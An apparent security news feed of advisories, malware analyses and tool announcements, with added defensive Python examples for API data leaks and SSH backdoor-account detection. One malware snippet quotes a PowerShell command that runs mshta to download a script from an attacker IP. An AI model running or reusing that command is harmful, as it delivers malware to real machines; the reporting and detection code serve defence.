Unleashing the power of cloud with containerisation
New NCSC guidance describes how organisations can make the most of containerisation.
https://www.ncsc.gov.uk/blog-post/unleashing-the-power-of-cloud-with-containerisation

QR Codes - what's the real risk?
How safe is it to scan that QR code in the pub? Or in that email?
https://www.ncsc.gov.uk/blog-post/qr-codes-whats-real-risk

Phishing attacks: defending your organisation
How to defend your organisation from email phishing attacks.
https://www.ncsc.gov.uk/guidance/phishing

Microsoft BitLocker Bypasses are Practical
In this blog article, we would like to share key insights from the "Defeating Microsoft's Default BitLocker Implementation" security training by Hands-On Security and emphasize the potential risks and consequences associated with this attack technique. Our target audience includes businesses looking to safeguard sensitive data on their Windows devices, as well as individuals with an elevated requirement for protecting their data.
https://blog.compass-security.com/2024/02/microsoft-bitlocker-bypasses-are-practical/

FortiNAC - XSS in Show Audit Log
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiNAC may allow a remote unauthenticated attacker to perform a stored cross site scripting (XSS) attack via the name fields observed in the policy audit logs.
https://fortiguard.fortinet.com/psirt/FG-IR-23-063

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html

Fileless Revenge RAT Malware
AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of Revenge RAT malware that had been developed based on legitimate tools. It appears that the attackers have used tools such as ‘smtp-validator’ and ‘Email To Sms’. At the time of execution, the malware creates and runs both a legitimate tool and a malicious file, making it difficult for users to realize that a malicious activity has occurred. As shown in the code below, the threat actor creates and runs Setup.exe...
https://asec.ahnlab.com/en/61584/

North Korea's DMARC spoofing tricks

https://www.proofpoint.com/us/newsroom/news/north-koreas-dmarc-spoofing-tricks

Ongoing campaign compromises senior execs' Azure accounts, locks them using MFA

https://www.proofpoint.com/us/newsroom/news/ongoing-campaign-compromises-senior-execs-azure-accounts-locks-them-using-mfa

The architecture of SAST tools: An explainer for developers
More developers will have to fix security issues in the age of shifting left. Here, we break down how SAST tools can help them find and address vulnerabilities.
https://github.blog/2024-02-12-the-architecture-of-sast-tools-an-explainer-for-developers/

Diving Into Glupteba's UEFI Bootkit
A 2023 Glupteba campaign includes an unreported feature — a UEFI bootkit. We analyze its complex architecture and how this botnet has evolved.
https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/

Critical Fortinet FortiOS CVE-2024-21762 Exploited
CVE-2024-21762 is a critical out-of-bounds write vulnerability in Fortinet's FortiOS operating system that is known to have been exploited in the wild. Fortinet SSL VPN vulnerabilities are frequent targets for state-sponsored and other motivated adversaries.
https://blog.rapid7.com/2024/02/12/etr-critical-fortinet-fortios-cve-2024-21762-exploited/

Serious Security Vulnerability Patched In Shield Security WP Plugin
A serious security vulnerability affected the WordPress plugin Security Shield, which could allow arbitrary file…
https://latesthackingnews.com/2024/02/10/serious-security-vulnerability-patched-in-shield-security-wp-plugin/

SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives through response time analysis and to send alerts upon detection, with built-in Discord notification functionality. Key Features: Time-Based Blind SQL Injection Detection: pinpoints potential SQL injection vulnerabilities in HTTP headers. Multi-Threaded Scanning: offers faster scanning through concurrent processing. Discord Notifications: sends alerts via Discord webhook for detected vulnerabilities. False Positive Checks: implements response time analysis...
http://www.kitploit.com/2024/02/sqlisniper-advanced-time-based-blind.html

How DevOps evolved into DevSecOps: Embracing security in software development
The journey from DevOps to DevSecOps signifies a shift towards valuing security more prominently in how you create and maintain code, highlighting its increased importance within your software development and operations.
https://blog.sonatype.com/how-devops-evolved-into-devsecops-embracing-security-in-software-development

Metasploit Weekly Wrap-Up 02/09/2024
This week's wrap-up includes three new exploits for Docker, Fortra GoAnywhere and Cacti.
https://blog.rapid7.com/2024/02/09/metasploit-weekly-wrap-up-02-09-2024/

Closing the Security Gap: Navigating Modern Technology and Outdated Systems in Linux Security
Most businesses understand the need for cybersecurity. However, many of those same companies still rely on outdated systems, making it hard to ensure the security they know they need.
https://linuxsecurity.com/features/features/closing-the-linux-security-gap

Some DMARC questions answered, as deadlines near

https://www.proofpoint.com/us/newsroom/news/some-dmarc-questions-answered-deadlines-near

A Detailed Guide on Ligolo-Ng
This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of
https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/

Juniper Support Portal Exposed Customer Device Info
Until earlier this week, the support website for networking equipment vendor Juniper Networks was exposing potentially sensitive information tied to customer products, including the exact devices each customer bought, as well as each device's warranty status, service contracts and serial numbers. Juniper said it has since fixed the problem, and that the inadvertent data exposure stemmed from a recent upgrade to its support portal.
https://krebsonsecurity.com/2024/02/juniper-support-portal-exposed-customer-device-info/

Ransomware payments hit a record high in 2023 – Week in security with Tony Anscombe
Called a "watershed year for ransomware", 2023 marked a reversal from the decline in ransomware payments observed in the previous year
https://www.welivesecurity.com/en/videos/ransomware-payments-record-week-security-tony-anscombe/

CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged
Execute code within Azure Automation service without getting charged Description CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization. This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged. Each execution is limited to 3 hours Requirements Python 3.8+ with the libraries mentioned in the file requirements.txt Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli...
http://www.kitploit.com/2024/02/cloudminer-execute-code-using-azure.html

Critical Vulnerability Could Allow Mastodon Account Takeover
Heads up, Mastodon admins! A critical security vulnerability riddled Mastodon, allowing account takeover by an…
https://latesthackingnews.com/2024/02/08/critical-vulnerability-could-allow-mastodon-account-takeover/

New macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group
UPDATE: Following our initial release, we have been contacted by our fellow researchers at Jamf who were able to identify three more samples that act like first-stage payloads. They are responsible for downloading the backdoor: * e7cab6f2be47940bf36e279bbec54ec7 - Jobinfo.app.zip * 26d6a7e3507edf9953684d367dcd44bd - Jobinfo.zip * 775851f86cbde630808ff6d2cf8cedbf - Jobinfo.zip Combined with information in our previous research, the investigation of these samples revealed new components of t
https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/

Microsoft Copilot for Security provides immediate impact for the Microsoft Defender Experts team
Microsoft Copilot for Security provides tangible applications to the Defender Experts' daily work—including building incident narratives, analyzing threats, time-saving tips, upskilling, and more.
https://www.microsoft.com/en-us/security/blog/2024/02/08/microsoft-copilot-for-security-provides-immediate-impact-for-the-microsoft-defender-experts-team/

Malicious Android Apps On Google Play Store Deliver VajraSpy RAT
Heads up, Android users! Another wave of malicious apps has flooded the Google Play Store…
https://latesthackingnews.com/2024/02/08/malicious-android-apps-on-google-play-store-deliver-vajraspy-rat/

NIST's International Cybersecurity and Privacy Engagement Update – International Dialogues, Workshops, and Translations
With the new year under way, NIST is continuing to engage with our international partners to enhance cybersecurity. Here are some updates on our international work from the end of 2023 into the beginning of 2024: Conversations have continued with our partners throughout the world on the update to the NIST Cybersecurity Framework (CSF) 2.0 . The current Draft CSF 2.0 has been shared in a public comment period that ended in November 2023. Stay tuned for the final version to be published soon! NIST international engagement continues through our support to the Department of State and the
https://www.nist.gov/blogs/cybersecurity-insights/nists-international-cybersecurity-and-privacy-engagement-update

SADProtocol goes to Hollywood
Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and found two high-severity vulnerabilities. This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, he opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen. They uncovered two LAN remote code execution...
http://www.kitploit.com/2024/02/sadprotocol-goes-to-hollywood.html

The buck stops here: Why the stakes are high for CISOs
Heavy workloads and the specter of personal liability for incidents take a toll on security leaders, so much so that many of them look for the exits. What does this mean for corporate cyber-defenses?
https://www.welivesecurity.com/en/business-security/buck-stops-stakes-high-cisos/

Coyote: A multi-stage banking Trojan abusing the Squirrel installer
We will delve into the workings of the infection chain and explore the capabilities of the new Trojan that specifically targets users of more than 60 banking institutions, mainly from Brazil.
https://securelist.com/coyote-multi-stage-banking-trojan/111846/

BlueShell Used in Attacks Against Linux Systems in Korea (2)
AhnLab SEcurity intelligence Center (ASEC) previously uploaded the article “BlueShell Used in APT Attacks Against Korean and Thai Targets” [1] on the ASEC blog which introduced BlueShell malware strains that were used against Linux systems in Thailand and Korea. The threat actor customized the BlueShell backdoor malware for their attack, and configured the malware’s operating condition to only work in specific systems. Even after the article’s release, the BlueShell malware strains developed by the same threat actor are being continuously collected...
https://asec.ahnlab.com/en/61549/

FortiClientEMS - Improper privilege management for site super administrator
An improper privilege management vulnerability [CWE-269] in the FortiClientEMS graphical administrative interface may allow a site administrator with Super Admin privileges to perform global administrative operations affecting other sites via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-357

FortiManager - Informative error messages
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow an adom administrator to enumerate other adoms and device names via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-268

FortiOS - Format String Bug in fgfmd
A use of externally-controlled format string vulnerability [CWE-134] in FortiOS fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-029

FortiOS - Fortilink lack of certificate validation
An improper certificate validation vulnerability [CWE-295] in FortiOS may allow an unauthenticated attacker in a Man-in-the-Middle position to decipher and alter the FortiLink communication channel between the FortiOS device and a FortiSwitch instance.
https://fortiguard.fortinet.com/psirt/FG-IR-23-301

FortiOS & FortiProxy - CVE-2023-44487 - Rapid Reset HTTP/2 vulnerability
The Fortinet Product Security team has evaluated the impact of the vulnerability HTTP/2 Rapid Reset Attack, listed below: CVE-2023-44487: The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly. https://nvd.nist.gov/vuln/detail/CVE-2023-44487
https://fortiguard.fortinet.com/psirt/FG-IR-23-397

FortiOS/FortiProxy - Out-of-bound Write in sslvpnd
An out-of-bounds write vulnerability [CWE-787] in FortiOS and FortiProxy may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted HTTP requests. Workaround: disable SSL VPN (disabling webmode is NOT a valid workaround). Note: This is potentially being exploited in the wild.
https://fortiguard.fortinet.com/psirt/FG-IR-24-015

From Cybercrime Saul Goodman to the Russian GRU
In 2021, the exclusive Russian cybercrime forum Mazafaka was hacked. The leaked user database shows one of the forum's founders was an attorney who advised Russia's top hackers on the legal risks of their work, and what to do if they got caught. A review of this user's hacker identities shows that during his time on the forums he served as an officer in the special forces of the GRU, the foreign military intelligence agency of the Russian Federation.
https://krebsonsecurity.com/2024/02/from-cybercrime-saul-goodman-to-the-russian-gru/

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable! Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support. The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub* (Alpine-based images and Debian-based multi-arch images). *The Docker images are built on release day and may not be available until later in the day. Continue reading to learn what changed in each version. 1.3.0: ClamAV 1.3.0 includes the following improvements and changes. Major changes: Added support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html

5 Insights from the Latest Cybersecurity Trends Research
We've singled out five quick insights security professionals and stakeholders should consider when looking ahead. These findings are based on Top Trends in Cybersecurity for 2024, a new research report from Gartner®.
https://blog.rapid7.com/2024/02/07/5-insights-from-the-latest-cybersecurity-trends-research/

Back to basics: Better security in the AI era
The rise of artificial intelligence (AI), large language models (LLM) and IoT solutions has created a new security landscape. From generative AI tools that can be taught to create malicious code to the exploitation of connected devices as a way for attackers to move laterally across networks, enterprise IT teams find themselves constantly running to […]
https://securityintelligence.com/articles/back-to-basics-better-security-ai/

Avast Q4/2023 Threat Report
10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q4-2023-threat-report

Navigating the Shift: Unveiling the changes in PCI DSS version 4
Gain insights in the latest changes in PCI DSS version 4 with this quick overview, highlighting the primary changes and how to best prepare for them.
https://www.legitsecurity.com/blog/navigating-the-shift-unveiling-the-changes-in-pci-dss-version-4

Distribution of RAT Malware Disguised as a Gambling-related File
AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA. The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script. PowerShell command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta' The malicious URLs in the confirmed shortcut file are as follows: hxxp://193.***.***[.]253:7287/2.hta.hta...
https://asec.ahnlab.com/en/61335/

Piloting new ways of protecting Android users from financial fraud
Posted by Eugene Liderman, Director of Mobile Security Strategy, Google. From its founding, Android has been guided by principles of openness, transparency, safety, and choice. Android gives you the freedom to choose which device best fits your needs, while also providing the flexibility to download apps from a variety of sources, including preloaded app stores such as the Google Play Store or the Galaxy Store; third-party app stores; and direct downloads from the Internet. Keeping users safe in an open ecosystem takes sophisticated defenses. That's why Android provides multiple layers of protections, powered by AI and backed by a large dedicated security & privacy team, to help to protect our users from security threats while continually making the platform more resilient. We also provide...
http://security.googleblog.com/2024/02/piloting-new-ways-to-protect-Android-users-from financial-fraud.html

Data Leak Detected by AhnLab EDR (vs. Ransomware Threat Actors)
Ransomware threat actors have been extorting money after taking control over organizations’ internal networks, distributing ransomware, encrypting systems, and holding system restoration for ransom. Recently, however, threat actors not only encrypt the systems but also leak internal data and threaten to expose it publicly if the ransom is not paid. Usually, these threat actors collect data, compress it, and leak it publicly. In such processes, threat actors utilize many legitimate utility programs. These programs already allow stable transfer of large-sized...
https://asec.ahnlab.com/en/61480/

Mastering SBOMs: Best practices
In our recent webinar, Mastering SBOMs: Best Practices, speakers, including Ilkka Turunen, Field CTO, Sonatype, Roger Smith, Global Testing and Digital Assurance Lead, DXC Technology, and Marc Luescher, Solution Architect, AWS, shed light on the importance of software bills of materials (SBOMs) in software development.
https://blog.sonatype.com/mastering-sboms-best-practices

Legit Security Named in the 2024 Gartner® Emerging Tech Impact Radar: Cloud-Native Platforms report
Legit Security Named a Sample Vendor for Software Supply Chain Security in the 2024 Gartner® Emerging Tech Impact Radar: Cloud-Native Platforms report.
https://www.legitsecurity.com/blog/legit-named-in-gartner-emerging-tech-impact-radar

AppSec is harder than you think. Here's how AI can help.
In practice, shifting left has been more about shifting the burden rather than the ability. But AI is bringing its promise closer to reality. Here's how.
https://github.blog/2024-02-06-appsec-is-harder-than-you-think-heres-how-ai-can-help/

Celebrating Excellence: Alex Page Recognized As a CRN 2024 Channel Chief
Congratulations to Rapid7's Vice President of Global Channel Sales, Alex Page, who is named among the newly-announced CRN 2024 Channel Chiefs!
https://blog.rapid7.com/2024/02/06/celebrating-excellence-alex-page-recognized-as-a-crn-2024-channel-chief/

How to Use AI Prompting for Security Vulnerabilities
Zahra Putri Fitrianti explores the power of AI prompting for security vulnerabilities at HackerOne.
https://www.hackerone.com/ai/how-to-use-ai-prompting

Microsoft Entra Verified ID introduces Face Check in preview
Face Check is now in preview in Microsoft Entra Verified ID, unlocking high-assurance verifications for enterprises securely, simply, and at scale.
https://www.microsoft.com/en-us/security/blog/2024/02/06/microsoft-entra-verified-id-introduces-face-check-in-preview/

Four Key Benefits of Rapid7's New Managed Digital Risk Protection Service
Cybercrime has boomed to the third largest economy in the world behind the US and China, with much of the most nefarious behavior on the dark web. Monitoring it effectively can be the key to identifying the earliest signals of an attack – and the difference between a minor event and a major breach.
https://blog.rapid7.com/2024/02/06/four-key-benefits-of-rapid7s-new-managed-digital-risk-protection-service/

Third-party breaches hit 90% of top global energy companies
A new report from SecurityScorecard reveals a startling trend among the world’s top energy companies, with 90% suffering from data breaches through third parties over the last year. This statistic is particularly concerning given the crucial function these companies serve in everyday life. Their increased dependence on digital systems facilitates the increase in attacks on […]
https://securityintelligence.com/articles/third-party-breaches-top-global-energy-companies/

Azure HDInsight privilege escalation and DoS vulnerabilities
Three privilege escalation and denial-of-service vulnerabilities were discovered in Azure HDInsight, related to its usage of Apache Oozie and Ambari. The root cause of at least one of these vulnerabilities is a flaw in Apache Oozie itself, leading to regex denial-of-service (ReDoS). The other two vulnerabilities could allow an authenticated attacker with HDI cluster access to gain cluster administrator privileges and perform any resource service management operation. The vulnerabilities were patched in the October 2023 security update of Azure HDInsight.
https://www.cloudvulndb.org/azure-hdinsight-dos

Ivanti Connect Secure and Policy Secure Gateways Zero-day Vulnerabilities (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, CVE-2024-21893)
What is the Vulnerability? Ivanti recently published an advisory on two vulnerabilities on Jan 10, 2024 affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure Gateways (CVE-2023-46805 and CVE-2024-21887). The vulnerabilities are an authentication bypass and a command injection vulnerability, respectively, in the web component of the affected application. According to the vendor advisory, exploiting these vulnerabilities when chained together may allow attackers to run commands without the need for authentication on the compromised system. Both vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. What is the Vendor Solution? At the time of posting, there is no patch available; Ivanti has released workarounds as the two new...
https://fortiguard.fortinet.com/threat-signal-report/5371

Improving Interoperability Between Rust and C++
Posted by Lars Bergstrom – Director, Android Platform Tools & Libraries and Chair of the Rust Foundation Board Back in 2021, we announced that Google was joining the Rust Foundation. At the time, Rust was already in wide use across Android and other Google products. Our announcement emphasized our commitment to improving the security reviews of Rust code and its interoperability with C++ code. Rust is one of the strongest tools we have to address memory safety security issues. Since that announcement, industry leaders and government agencies have echoed our sentiment. We are delighted to announce that Google has provided a grant of million to the Rust Foundation to support efforts that will improve the ability of Rust code to interoperate with existing legacy C++ codebases. We're...
http://security.googleblog.com/2024/02/improving-interoperability-between-rust-and-c.html

Exploited Ivanti Connect SSRF vulnerability traced back to 'xmltooling' OSS library
Over the past few weeks, vulnerabilities in proprietary Ivanti products, in particular Ivanti Connect Secure, Policy Secure, and ZTA gateways, have been making headlines for their active exploitation in the wild.
https://blog.sonatype.com/the-exploited-ivanti-connect-ssrf-vulnerability-stems-from-xmltooling-oss-library

Bots Cheat to Win
How automated fraudsters tried to ruin a restaurant’s promotional contest.
https://www.f5.com/labs/articles/threat-intelligence/bots-cheat-to-win

Ransomware Retrospective 2024: Unit 42 Leak Site Analysis
Analysis of ransomware gang leak site data reveals significant activity over 2023. As groups formed or dissolved and tactics changed, we synthesize our findings.
https://unit42.paloaltonetworks.com/unit-42-ransomware-leak-site-data-analysis/

Could your Valentine be a scammer? How to avoid getting caught in a bad romance
With Valentine's Day almost upon us, here's some timely advice on how to prevent scammers from stealing more than your heart
https://www.welivesecurity.com/en/scams/online-dating-scams-avoid-getting-caught-bad-romance/

Spoutible - 207,114 breached accounts
In January 2024, Spoutible had 207k records scraped from a misconfigured API that inadvertently returned excessive personal information. The data included names, usernames, email and IP addresses, phone numbers (where provided to the platform), genders and bcrypt password hashes. The incident also exposed 2FA secrets and backup codes along with password reset tokens.
https://haveibeenpwned.com/PwnedWebsites#Spoutible
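The failure mode behind the Spoutible scrape, an API that returns the whole stored user record instead of the fields the caller is entitled to, is easy to reproduce and easy to test for. The following is an added example in Python, not Spoutible's code: a leaky serializer beside an allowlisted one, plus a regression check that a test suite can run against any endpoint that returns user data. The record layout, field names and every value are constructed for the example.

```python
from dataclasses import dataclass, asdict
from typing import Dict, List, Optional, Set


@dataclass
class User:
    # Constructed record; the field kinds mirror what the Spoutible scrape exposed.
    id: int
    username: str
    name: str
    email: str
    phone: Optional[str]
    gender: Optional[str]
    last_ip: str
    password_hash: str          # bcrypt hash: offline-crackable, never a client's concern
    totp_secret: str            # 2FA seed: lets whoever holds it generate valid codes
    backup_codes: List[str]     # 2FA bypass
    reset_token: Optional[str]  # account takeover without the password


SAMPLE = User(
    id=1, username="alice", name="Alice Example", email="alice@example.invalid",
    phone="+1-555-0100", gender="f", last_ip="192.0.2.10",
    password_hash="$2b$12$constructed.hash.value.for.the.example.only",
    totp_secret="JBSWY3DPEHPK3PXP", backup_codes=["1111-2222", "3333-4444"],
    reset_token="constructed-reset-token",
)

# Fields that must never appear in any API response, whoever the caller is.
SECRET_FIELDS: Set[str] = {"password_hash", "totp_secret", "backup_codes",
                           "reset_token", "last_ip"}


def profile_leaky(user: User) -> Dict:
    """Vulnerable pattern: serialize the model object as-is.
    Every column leaks, and any column added later leaks too."""
    return asdict(user)


PUBLIC_FIELDS = ("id", "username", "name")
OWNER_FIELDS = PUBLIC_FIELDS + ("email", "phone", "gender")


def profile_safe(user: User, viewer_is_owner: bool) -> Dict:
    """Hardened pattern: an explicit allowlist per audience.
    Secrets are on no list, so there is no code path that emits them."""
    allowed = OWNER_FIELDS if viewer_is_owner else PUBLIC_FIELDS
    return {field: getattr(user, field) for field in allowed}


def leaked_secrets(response: Dict) -> Set[str]:
    """Regression check: which forbidden keys an API response contains.
    Run it in CI against every endpoint that returns user data."""
    return SECRET_FIELDS & set(response)


if __name__ == "__main__":
    print("leaky  :", sorted(leaked_secrets(profile_leaky(SAMPLE))))
    print("public :", profile_safe(SAMPLE, viewer_is_owner=False))
    print("owner  :", profile_safe(SAMPLE, viewer_is_owner=True))
```

The allowlist fixes the excessive data; it does not address the other half of the incident, which is that 207k records could be pulled at all. That part needs rate limiting and enumeration controls on the endpoint, and a denylist check like `leaked_secrets` in the test suite catches the next column somebody adds to the model.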

CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626 AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue. Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center. Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/

Grandoreiro banking malware disrupted – Week in security with Tony Anscombe
The banking trojan, which targeted mostly Brazil, Mexico and Spain, blocked the victim's screen, logged keystrokes, simulated mouse and keyboard activity and displayed fake pop-up windows
https://www.welivesecurity.com/en/videos/grandoreiro-banking-malware-disrupted-week-in-security-with-tony-anscombe/

November 2023 Cyber Attacks Statistics
November 2023 saw a rise to 39 events, with Cyber Crime remaining dominant at 78.7%. Cyber Espionage increased to 9.7%, while Hacktivism fell to 5.4%. Malware was the leading attack technique at 42.1%, and Multiple Organizations were the most targeted at 17.7%.
https://www.hackmageddon.com/2024/02/02/november-2023-cyber-attacks-statistics/

Exploring the Latest Mispadu Stealer Variant
Evaluation of a new variant of Mispadu, a banking Trojan, highlights how infostealers evolve over time and can be hard to tie to past campaigns.
https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/

Threat Actors Installing Linux Backdoor Accounts
AhnLab SEcurity intelligence Center (ASEC) is using a Linux SSH honeypot to monitor attacks launched indiscriminately against Linux systems. Threat actors install malware by launching brute force and dictionary attacks against poorly managed Linux systems, such as those left on default settings or protected by a simple password. While the attack cases vary, including ones where worms, CoinMiners, and DDoS bots are installed, this post covers cases where backdoor accounts are created instead of malware. Such attacks...
https://asec.ahnlab.com/en/61185/
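The two things described above, a password guessed after a run of failures and an account added to hold on to the access, both leave traces that a few lines of log parsing will surface. Below is an added example in Python, not ASEC's honeypot tooling: it runs over a constructed auth.log excerpt and a constructed /etc/passwd snapshot, flags successful SSH logins from a source that had already failed repeatedly, flags `useradd` events with UID 0 or a home directory outside `/home`, and lists any non-root UID 0 account in the passwd file. The log lines follow the sshd and shadow-utils message formats but are made up for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed auth.log excerpt (not ASEC honeypot data): a password spray against root
# that eventually succeeds, followed by the creation of a UID 0 backdoor account.
AUTH_LOG = """\
Jan 30 02:11:01 host sshd[1201]: Failed password for root from 198.51.100.7 port 40112 ssh2
Jan 30 02:11:03 host sshd[1201]: Failed password for root from 198.51.100.7 port 40113 ssh2
Jan 30 02:11:05 host sshd[1202]: Failed password for invalid user admin from 198.51.100.7 port 40114 ssh2
Jan 30 02:11:07 host sshd[1203]: Failed password for root from 198.51.100.7 port 40115 ssh2
Jan 30 02:11:09 host sshd[1204]: Failed password for root from 198.51.100.7 port 40116 ssh2
Jan 30 02:11:12 host sshd[1205]: Accepted password for root from 198.51.100.7 port 40117 ssh2
Jan 30 02:12:40 host useradd[1300]: new user: name=sysmon, UID=0, GID=0, home=/var/tmp/.sysmon, shell=/bin/bash
Jan 30 02:12:41 host passwd[1301]: pam_unix(passwd:chauthtok): password changed for sysmon
Jan 30 03:00:00 host sshd[1400]: Accepted publickey for deploy from 203.0.113.5 port 51000 ssh2
"""

# Constructed /etc/passwd snapshot with the same backdoor account appended.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deploy:x:1001:1001::/home/deploy:/bin/bash
sysmon:x:0:0::/var/tmp/.sysmon:/bin/bash
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+)")
USERADD = re.compile(r"useradd\[\d+\]: new user: name=([^,]+), UID=(\d+), GID=(\d+), "
                     r"home=([^,]+), shell=([^,\s]+)")


def brute_force_logins(log: str, threshold: int = 3) -> List[Dict]:
    """Successful logins from a source that had already failed `threshold` or more times.
    A success right after a run of failures is the signature of a guessed password."""
    failures = defaultdict(int)
    hits = []
    for line in log.splitlines():
        m = FAILED.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(3)] >= threshold:
            hits.append({"method": m.group(1), "user": m.group(2),
                         "src": m.group(3), "failures": failures[m.group(3)]})
    return hits


def suspicious_new_accounts(log: str) -> List[Dict]:
    """useradd events that look like backdoors: UID 0, or a home directory outside /home."""
    findings = []
    for line in log.splitlines():
        m = USERADD.search(line)
        if not m:
            continue
        name, uid, _gid, home, _shell = m.groups()
        reasons = []
        if uid == "0":
            reasons.append("uid 0")
        if not home.startswith("/home/"):
            reasons.append("home outside /home")
        if reasons:
            findings.append({"name": name, "reasons": reasons})
    return findings


def extra_uid0_accounts(passwd: str) -> List[str]:
    """Any account other than root with UID 0 in /etc/passwd (works without logs)."""
    found = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


if __name__ == "__main__":
    print(brute_force_logins(AUTH_LOG))
    print(suspicious_new_accounts(AUTH_LOG))
    print(extra_uid0_accounts(PASSWD))
```

The passwd check is the one to keep even if logs are unavailable or were wiped: an attacker who already has root can edit `/etc/passwd` directly without ever calling `useradd`, so a periodic diff of that file against a known-good copy catches what the log-based rules miss.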

Distribution of Qshing Emails Disguised as Payslips
AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of Qshing emails impersonating the Ministry of Finance of the People's Republic of China. Qshing, a portmanteau of "QR code" and "phishing", is an attack in which scanning a QR code installs a malicious app or directs the user to a phishing site. The email being distributed, shown in Figure 1, is disguised as a paycheck receipt confirmation for the first quarter of 2024....
https://asec.ahnlab.com/en/61104/

Analysis of Phishing Case Impersonating a Famous Korean Portal Login Page
AhnLab SEcurity intelligence Center (ASEC) has recently analyzed a phishing case in which a phishing page was disguised as the login page of a famous Korean portal website, and then collected some information on the threat actor. The fake login page, believed to have been distributed as hyperlinks in phishing emails, was found to be very similar to the real portal's login page. In fact, it is difficult to realize that...
https://asec.ahnlab.com/en/61130/

Arrests in $400M SIM-Swap Tied to Heist at FTX?
Three Americans were charged this week with stealing more than $400 million in a November 2022 SIM-swapping attack. The U.S. government did not name the victim organization, but there is every indication that the money was stolen from the now-defunct cryptocurrency exchange FTX, which had filed for bankruptcy on that same day.
https://krebsonsecurity.com/2024/02/arrests-in-400m-sim-swap-tied-to-heist-at-ftx/

UN Cybercrime Treaty Could Endanger Web Security
